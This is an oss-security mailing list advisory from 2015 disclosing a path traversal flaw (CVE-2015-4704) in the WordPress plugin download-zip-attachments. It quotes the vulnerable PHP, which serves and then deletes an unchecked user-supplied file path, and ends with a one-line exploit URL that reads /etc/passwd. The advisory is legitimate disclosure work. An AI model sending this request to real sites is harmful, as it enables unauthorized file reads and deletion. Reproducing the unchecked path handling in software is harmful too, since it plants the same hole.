[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Remote file download vulnerability in download-zip-attachments v1.0
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2015-06-23 20:07:49
Message-ID: B84727D4-14F8-42D7-B115-D5AD2D9DCCF4 () me ! com
[Download RAW message or body]

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with \
in the specified upload directory.

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
   define('WP_USE_THEMES', false);
   require('../../../wp-load.php');    
   require "create_zip_file.php";
   $uploads = wp_upload_dir(); 
   $tmp_location = $uploads['path']."/".$_REQUEST['File'];
   //echo $tmp_location;
   $zip = new CreateZipFile;
   $zip->forceDownload($tmp_location,false);     
   unlink($tmp_location); 
   exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
	• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd=



[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic